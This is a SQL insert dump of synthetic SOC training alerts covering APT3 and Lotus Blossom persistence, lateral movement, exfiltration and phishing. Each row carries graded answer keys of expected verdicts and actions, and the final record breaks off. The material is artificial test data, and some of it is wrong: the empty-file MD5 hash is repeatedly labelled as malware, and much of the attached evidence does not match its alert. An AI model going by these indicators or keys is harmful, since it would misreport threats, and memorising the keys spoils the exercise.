(1227, 'Pirpi Malware Persistence Mechanism', 'high', 'Host-based Intrusion Prevention System (HIPS)', 'APT3 has deployed the Pirpi malware to maintain persistence within the network. The malware was detected using a known persistence mechanism involving specific registry modifications and a malicious executable file. Immediate action is needed to prevent further compromise.', 'Persistence', 'T1547.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"HIPS_ALERT_5872\",\"source_ip\":\"192.168.15.22\",\"detected_file\":\"C:\\\\Windows\\\\System32\\\\pirpi_service.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"registry_change\":{\"key\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"value_name\":\"PirpiService\",\"value_data\":\"\\\"C:\\\\Windows\\\\System32\\\\pirpi_service.exe\\\"\"},\"attacker_ip\":\"203.0.113.45\",\"username\":\"compromised_user\"}', '2026-02-07 21:29:13', '2026-02-19 15:49:29', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.15.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal host suspected to be compromised.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT3 activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_db\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to Pirpi malware executable.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_audit\",\"verdict\":\"suspicious\",\"details\":\"User account suspected to be 
compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.559Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"HIPS_ALERT_5872\\\",\\\"source_ip\\\":\\\"192.168.15.22\\\",\\\"detected_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi_service.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"PirpiService\\\",\\\"value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi_service.exe\\\\\\\"\\\"},\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.559Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"HIPS_ALERT_5872\\\",\\\"source_ip\\\":\\\"192.168.15.22\\\",\\\"detected_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi_service.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"PirpiService\\\",\\\"value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi_service.exe\\\\\\\"\\\"},\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.559Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"HIPS_ALERT_5872\\\",\\\"source_ip\\\":\\\"192.168.15.22\\\",\\\"detected_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi_service.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"PirpiService\\\",\\\"value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi_service.exe\\\\\\\"\\\"},\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.559Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"HIPS_ALERT_5872\\\",\\\"source_ip\\\":\\\"192.168.15.22\\\",\\\"detected_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi_service.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"PirpiService\\\",\\\"value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi_service.exe\\\\\\\"\\\"},\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.559Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"HIPS_ALERT_5872\\\",\\\"source_ip\\\":\\\"192.168.15.22\\\",\\\"detected_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi_service.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"PirpiService\\\",\\\"value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pirpi_service.exe\\\\\\\"\\\"},\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1228, 'Lateral Movement via Windows Exploit', 'high', 'Network Traffic Analysis Tool', 'APT3 exploited a Windows zero-day vulnerability to move laterally within the network, targeting internal systems. The attack was detected through abnormal network traffic originating from an external IP address known for malicious activities.', 'Lateral Movement', 'T1570: Lateral Tool Transfer', 1, 'resolved', NULL, '{\"timestamp\":\"2023-11-02T14:23:45Z\",\"src_ip\":\"203.0.113.45\",\"dest_ip\":\"192.168.1.15\",\"protocol\":\"SMB\",\"action\":\"Exploit Attempt\",\"exploit_name\":\"Windows-ZeroDay-2023\",\"associated_file\":\"APT3_toolkit_v2.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"username\":\"jdoe\",\"process_name\":\"svchost.exe\",\"alert_id\":\"LM-20231102-01\"}', '2026-02-07 21:29:13', '2026-02-19 15:48:42', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with APT3 activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host targeted for lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Known APT3 malware hash\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"APT3_toolkit_v2.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File associated with APT3 toolkit\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1229, 'Data Exfiltration Detected', 'high', 'Data Loss Prevention (DLP) System', 'The final stage of APT3\'s operation involves exfiltrating critical data, utilizing encrypted channels to evade detection and complete their mission.', 'Exfiltration', 'T1048.003: Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"DLP-EXF-987654\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"filename\":\"financial_report_2023.xlsx\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"protocol\":\"HTTPS\",\"action\":\"exfiltration\",\"status\":\"blocked\",\"malware_name\":\"APT3_ExfilTool\",\"channel_encryption\":\"TLS 1.2\"}', '2026-02-07 21:29:13', '2026-02-19 15:49:42', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with APT3\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"financial_report_2023.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file targeted for exfiltration\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware analysis\",\"verdict\":\"malicious\",\"details\":\"File hash associated with APT3\'s exfiltration tool\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.562Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-EXF-987654\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"blocked\\\",\\\"malware_name\\\":\\\"APT3_ExfilTool\\\",\\\"channel_encryption\\\":\\\"TLS 1.2\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.562Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-EXF-987654\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"blocked\\\",\\\"malware_name\\\":\\\"APT3_ExfilTool\\\",\\\"channel_encryption\\\":\\\"TLS 1.2\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.562Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-EXF-987654\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"blocked\\\",\\\"malware_name\\\":\\\"APT3_ExfilTool\\\",\\\"channel_encryption\\\":\\\"TLS 1.2\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.562Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-EXF-987654\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"blocked\\\",\\\"malware_name\\\":\\\"APT3_ExfilTool\\\",\\\"channel_encryption\\\":\\\"TLS 1.2\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.562Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-EXF-987654\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"blocked\\\",\\\"malware_name\\\":\\\"APT3_ExfilTool\\\",\\\"channel_encryption\\\":\\\"TLS 1.2\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1230, 'Spear Phishing Email with Malicious Attachment', 'high', 'Email Gateway Logs', 'A spear phishing email was detected targeting Philippine military personnel. The email contained a malicious attachment aimed at deploying the Elise backdoor.', 'Initial Access', 'T1566.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-09-15T08:42:59Z\",\"email_id\":\"2023-09-15-0001\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.12.34.56\",\"email_subject\":\"Urgent: Updated Defense Protocols\",\"sender_email\":\"trusted.contact@military-gov.ph\",\"recipient_email\":\"j.doe@military.ph\",\"attachment_name\":\"Defense_Update_2023.pdf.exe\",\"attachment_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"malware_name\":\"Elise\",\"malware_family\":\"Lotus Blossom\",\"detection_method\":\"Attachment Analysis\",\"action_taken\":\"Quarantined\"}', '2026-02-07 21:48:01', '2026-02-19 15:47:32', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT infrastructure associated with Lotus Blossom.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.12.34.56\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of targeted system.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Elise malware.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"trusted.contact@military-gov.ph\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation\",\"verdict\":\"suspicious\",\"details\":\"Email address spoofing legitimate 
organization.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"Defense_Update_2023.pdf.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Attachment Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable disguised as a PDF file.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Email with Malicious Attachment\",\"date\":\"2026-02-08T19:00:02.564Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1231, 'Execution of Elise Backdoor', 'high', 'Endpoint Detection and Response (EDR) Alerts', 'Upon opening the attachment, the Elise backdoor is executed, establishing a covert channel for remote control by the attackers.', 'Execution', 'T1059.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"event_id\":\"EDR-22345\",\"hostname\":\"workstation-12\",\"username\":\"jdoe\",\"process_id\":4567,\"process_name\":\"elise_loader.exe\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\elise_loader.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"source_ip\":\"10.0.0.25\",\"destination_ip\":\"203.0.113.56\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"action\":\"Executed\",\"malicious\":true}', '2026-02-07 21:48:01', '2026-02-19 15:47:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Elise backdoor.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as Elise backdoor loader.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"elise_loader.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"FileNameDB\",\"verdict\":\"suspicious\",\"details\":\"Commonly used by malware for execution.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1232, 'Establishing Persistence Mechanism', 'high', 'Registry Change Logs', 'Lotus Blossom modifies system registry keys to maintain persistence, allowing the Elise backdoor to survive system reboots and user logouts.', 'Persistence', 'T1547.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-04T14:22:35Z\",\"event_id\":\"4720\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.23\",\"user\":\"compromised_user\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Elise\",\"file_path\":\"C:\\\\Users\\\\Public\\\\Elise\\\\elise.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"Modify\",\"description\":\"Registry key modified to run Elise backdoor on startup.\",\"user_sid\":\"S-1-5-21-3623811015-3361044348-30300820-1013\"}', '2026-02-07 21:48:01', '2026-02-19 15:48:03', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known Lotus Blossom command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal company server.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Users\\\\Public\\\\Elise\\\\elise.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Elise backdoor executable.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Lookup\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Elise backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.566Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T14:22:35Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Elise\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Elise\\\\\\\\elise.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Modify\\\",\\\"description\\\":\\\"Registry key modified to run Elise backdoor on startup.\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.566Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T14:22:35Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Elise\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Elise\\\\\\\\elise.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Modify\\\",\\\"description\\\":\\\"Registry key modified to run Elise backdoor on 
startup.\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.566Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T14:22:35Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Elise\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Elise\\\\\\\\elise.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Modify\\\",\\\"description\\\":\\\"Registry key modified to run Elise backdoor on startup.\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.566Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 